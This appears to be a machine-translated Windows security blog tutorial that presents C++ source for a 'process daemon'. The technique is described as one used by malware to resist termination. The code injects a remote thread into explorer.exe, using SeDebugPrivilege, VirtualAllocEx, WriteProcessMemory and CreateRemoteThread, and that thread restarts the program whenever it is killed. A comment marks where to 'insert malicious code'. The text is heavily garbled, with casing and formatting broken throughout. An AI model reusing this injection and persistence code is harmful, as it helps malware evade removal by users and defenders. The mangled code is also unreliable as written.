Secure road--c++ implementation process Daemon

Brief introduction

The so-called process daemon, is a process in order to protect themselves not to be ended, created a daemon to protect themselves, once the process is ended, it restarts. The process daemon approach, which is applied to malware, is a simple way to protect your processes and can be easily implemented under RING3. And the method of creating the daemon thread adopts the way of remote thread injection, I have introduced the basic method of remote thread injection, which is mainly divided into DLL remote injection and non-DLL remote injection.

Code implementation

filename:processprotectordemo.cpp// creator:peterzheng//date:2018/9/06 17:32//comment:process protector///////////////////////////////////////////// #pragma once#include <cstdio> #include <iostream> #include <cstdlib># Include <string.h> #include <string> #include <strsafe.h> #include <Windows.h> #include < Tlhelp32.h> #include <vector>using namespace std; #define MAX_LENGTH 255#pragma Warning (disable:4996)//             Remote thread parameter structure typedef struct _remotetdparams{lpvoid zwinexec;         WinExec Function Address lpvoid zopenprocess; OpenProcess Function Address lpvoid zwaitforsingleobject;                  WaitForSingleObject Function Address DWORD ZPid;       Param = Process ID HANDLE zprocesshandle;   Param = Handle CHAR filepath[max_length]; Param = File path}remoteparam;//Local thread parameter struct typedef struCT _localtdparams{CHAR remoteprocname[max_length];    DWORD Localpid;    DWORD Remotepid; HANDLE Hremotethread;} localparam;//string Split function bool Splitstring (const string& S, vector<string>& V, const string& c) {String::si    Ze_type pos1, Pos2;    Pos2 = S.find (c);    POS1 = 0;        while (string::npos! = Pos2) {v.push_back (S.substr (POS1, pos2-pos1));        POS1 = Pos2 + c.size ();    Pos2 = S.find (c, POS1);    } if (pos1! = s.length ()) V.push_back (S.substr (POS1)); return TRUE;} Remote thread function body (daemon function) DWORD WINAPI threadproc (Remoteparam *lprp) {typedef UINT (WINAPI *zwinexec) (LPCSTR lpcmdline, UINT Ucmds    how);    typedef HANDLE (WINAPI *zopenprocess) (DWORD dwdesiredaccess, BOOL bInheritHandle, DWORD dwprocessid);    typedef DWORD (WINAPI *zwaitforsingleobject) (HANDLE Hhandle, DWORD dwmilliseconds);    Zwinexec ZWE;    Zopenprocess ZOP;    Zwaitforsingleobject Zwfso;    ZWE = (zwinexec) lprp->zwinexec;   ZOP = (zopenprocess) lprp->zopenprocess; Zwfso = (zwaitforsingleobject) lprp->zwaitforsingleobject;    Lprp->zprocesshandle = ZOP (process_all_access, FALSE, lprp->zpid);    Zwfso (Lprp->zprocesshandle, INFINITE);    ZWE (Lprp->filepath, sw_show); return 0;}    Get Piddword __cdecl getprocessid (CHAR *processname) {PROCESSENTRY32 pe32;    pe32.dwsize = sizeof (PE32);    HANDLE Hprocesssnap = createtoolhelp32snapshot (th32cs_snapprocess, 0);    if (Hprocesssnap = = Invalid_handle_value) return 0;    BOOL bprocess = Process32First (Hprocesssnap, &pe32); while (bprocess) {if (strcmp (STRUPR (Pe32.szexefile), STRUPR (ProcessName)) = = 0) return Pe32.th32proc        EssID;    bprocess = Process32Next (Hprocesssnap, &pe32);    } closehandle (HPROCESSSNAP); return 0;}    get permission int __cdecl enabledebugpriv (const TCHAR *name) {HANDLE htoken;    Token_privileges TP;    LUID LUID; if (! OpenProcessToken (GetCurrentProcess (), Token_adjust_privileges | Token_query, &htoken)) return 1;    if (!    Lookupprivilegevalue (NULL, Name, &luid)) return 1; Tp.    Privilegecount = 1; Tp. Privileges[0].    Attributes = se_privilege_enabled; Tp. Privileges[0].    Luid = Luid; if (!    AdjustTokenPrivileges (htoken, 0, &AMP;TP, sizeof (token_privileges), NULL, NULL)) return 1; return 0;} Thread injection function bool __cdecl injectprocess (const DWORD Dwremotepid, const DWORD dwlocalpid, handle& hthread) {if (enabledeb    Ugpriv (Se_debug_name)) return FALSE;    HANDLE hWnd = OpenProcess (process_all_access, FALSE, dwremotepid);    if (!hwnd) return FALSE;    Remoteparam RP;    ZeroMemory (&AMP;RP, sizeof (Remoteparam)); Rp.    Zopenprocess = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "openprocess"); Rp.    Zwinexec = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "winexec"); Rp.    Zwaitforsingleobject = (LPVOID) GetProcAddress (LoadLibrary ("Kernel32.dll"), "WaitForSingleObject"); Rp.    ZPid = Dwlocalpid;    CHAR Szpath[max_length] = "n";   GetModuleFileName (NULL, szpath, sizeof (szpath)); StringCchCopy (Rp.filepath, sizeof (Rp.filepath), szpath); Remoteparam *premoteparam = (Remoteparam *) VirtualAllocEx (hWnd, 0, sizeof (remoteparam), Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premoteparam) return FALSE; if (!    WriteProcessMemory (HWnd, Premoteparam, &AMP;RP, sizeof (Remoteparam), 0)) return FALSE; LPVOID Premotethread = VirtualAllocEx (hWnd, 0, 1024x768 * 4, Mem_commit |    Mem_reserve, Page_execute_readwrite);    if (!premotethread) return FALSE; if (!    WriteProcessMemory (HWnd, Premotethread, &threadproc, 1024x768 * 4, 0)) return FALSE;    Hthread = CreateRemoteThread (hWnd, NULL, 0, (Lpthread_start_routine) Premotethread, (LPVOID) premoteparam, 0, NULL);    if (!hthread) return FALSE; return TRUE;} Remote thread monitoring function (local thread function) DWORD WINAPI watchfuncdata (lpvoid lprarm) {HANDLE Hremotethread = ((localparam*) lprarm)    Hremotethread;    DWORD dwlocalpid = ((localparam*) lprarm)->localpid;    DWORD dwremotepid = ((localparam*) lprarm)->remotepid; CHAR SzremotepRocname[max_length] = "n";    StringCchCopy (szremoteprocname, sizeof (Szremoteprocname), ((localparam*) lprarm)->remoteprocname);    DWORD exitCode = 0;        while (TRUE) {if (!hremotethread) injectprocess (Dwremotepid, Dwlocalpid, Hremotethread);        GetExitCodeThread (Hremotethread, &exitcode);            if (exitcode^still_active) {winexec (szremoteprocname, sw_hide);            Dwremotepid = GetProcessID (szremoteprocname);        Injectprocess (Dwremotepid, Dwlocalpid, Hremotethread);    } Sleep (1000); } return 0;} Main function int WINAPI WinMain (_in_ hinstance hinstance, _in_opt_ hinstance hprevinstance, _in_ LPSTR lpcmdline, _in_ int nshowcm    d) {Localparam LPLP;    ZeroMemory (&AMP;LPLP, sizeof (Localparam));    CHAR Szremoteprocname[max_length] = "n";    CHAR Szlocalprocname[max_length] = "n";    CHAR Currentfilepath[max_length] = "n";    Vector<string> Pathgroup; GetModuleFileName (NULL, currentFilePath, sizeof (currentFilePath));    Splitstring (currentFilePath, pathgroup, "\ \");    StringCchCopy (szlocalprocname, sizeof (Szlocalprocname), Pathgroup[pathgroup.size ()-1].c_str ());    StringCchCopy (szremoteprocname, sizeof (Szremoteprocname), "Explorer.exe");    StringCchCopy (szlocalprocname, sizeof (szlocalprocname), szlocalprocname);    StringCchCopy (lplp.remoteprocname, sizeof (lplp.remoteprocname), szremoteprocname);    DWORD dwremotepid = GetProcessID (szremoteprocname);    DWORD dwlocalpid = GetProcessID (szlocalprocname);    HANDLE hthread = NULL;    Lplp.remotepid = Dwremotepid;    Lplp.localpid = Dwlocalpid;    Hthread = CreateThread (NULL, 0, Watchfuncdata, LPVOID (&AMP;LPLP), 0, 0); //.... Insert malicious code such as workflow while (TRUE) {MessageBox (NULL, "hello!!", "haha!!    XDD ", MB_OK);    } WaitForSingleObject (Hthread, INFINITE); return 0;}

Secure Path--c++ implementation process Daemon